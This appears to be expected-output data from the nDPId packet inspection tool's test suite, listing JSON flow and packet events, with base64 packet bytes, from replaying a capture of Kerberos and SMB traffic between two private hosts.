+00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1549337952281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1549337952281,"pkt":"AAgCHEeupB9ywglqCABFAADbFApAAIAGfSGsEAgIrBAIyQBYwCubyT2Ifrnt1lAYAQDVagAATQg2IahlDr4Do2rw09NPfPwlJMuv1fJJCc5mjToXHNxo9crR1AT1CMr5O+bZxtqN6M9uCaNjeNur9XwIFCnpBuL05RtGDqn2i9hJpKd+E88QIO6v0xwHDv6iGr\/8TVgkK3vs2tcuY57O8+c4l9vRR7jejS5ww2dQZlIjb\/CCYROJuvRqA0LHwqGM0CcXmUposD8ISy568tJuLRICL3GBKJj5gtDiSRwMYGKFzsxgs2+QN48="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1549337952282,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1549337952282,"pkt":"pB9ywglqAAgCHEeuCABFAABLAUpAAIAGkHGsEAjJrBAICMAsAFiP2F5aCFrVJ1AYAQB5GAAAR6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbhyJqgFMAMCARI="} +00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1549337952282,"pkt":"AAgCHEeupB9ywglqCABFAABYFBBAAIAGfZ6sEAgIrBAIyQBYwCwIWtrbj9hefVAYAQDaWgAAkAFNdIHXOvUSiNrRZ37a2E9NpclNBTiyKWuPGcwkWc2OKSpCtzAbfs9v1WRIgz2U"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"flow_min_l4_payload_len":356,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":356,"midstream":1,"thread_ts_msec":1549337952282,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00939{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":410,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":410,"pkt_l4_len":376,"thread_ts_msec":1549337952282,"pkt":"pB9ywglqAAgCHEeuCABFAAGMAVBAAIAGjyqsEAjJrBAICMAqAb0OVvT1RRDYGlAYAP+BiQAAx2oDxasXfLBTEcjz3tABELHnmrS3ZANlrcp\/hNjXtg\/fwYTBDdsdTzX+XDaW+uv3s2\/LBkJPP0K4Dy0YU3CzKo3pfb0515XvBfsBO7Ma0iP8tOV8txynjcFaEQvYkdi2SQ6bebHRRKNuECPHoWmL3h9GQAZAb4a73kOXQ+HdWdMxxkSNni5ZeogFxLOO9R2cL7EvadD9j700FIRXk1Ysly6p8QSOxUcF2BTlCAMMXraIVwnaJn4OFnBRV1kK62QzrTna4Mma6JSVzK\/6fCHORQn+FIHExUVoG3Vq1BveDwHtG0XGyIXhHabrgc6YQttz\/jzBPNDyI9ROMV3pQ0pZrTLzCjs+95mV\/WzyQTG\/SRF7u\/0NE9yZnVgk7HZw7F9bqd7MfX+aga2J6\/HQLbCChYzLyXsDW8WbBsbXh+XIiTyOIboYMLvBqY271GjiVoIyA7mbRvLsykMc7DElauDSPsA2vtc="} +00807{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1549337952283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337952283,"pkt":"AAgCHEeupB9ywglqCABFAAEsFBRAAIAGfMasEAgIrBAIyQG9wCpFENgaDlb2WVAYAP9XsAAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAEAAAAAAAAA\/\/4AAAAAAABhAAAAAAQAAFesIp3Ms9YkV3HyzmcNx+gJAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbUXiUY0MYNrse7Xdy+nvFD1NZYMmVWsdodfXY9v69kCk+MLVD1Rqj48zpMQyXFgAZRbdNaLq\/lZFH5cVcwmZOZp6PzJLHFRz2Ys9FBPKwjMkCOL5scijYfadSqIU\/eT7q\/ACDBFzzf8MmsOdu9E="} +00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1549337930219,"flow_last_seen":1549337951711,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":1682,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1549337930219,"flow_last_seen":1549337951711,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":1682,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49165,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1549337940432,"flow_last_seen":1549337940433,"flow_idle_time":7560000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":863,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929811,"flow_last_seen":1549337929812,"flow_idle_time":7560000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7560000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7560000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7560000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00706{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00710{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7560000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00705{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7560000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7560000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7560000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":477,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00705{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951709,"flow_last_seen":1549337951710,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951709,"flow_last_seen":1549337951710,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 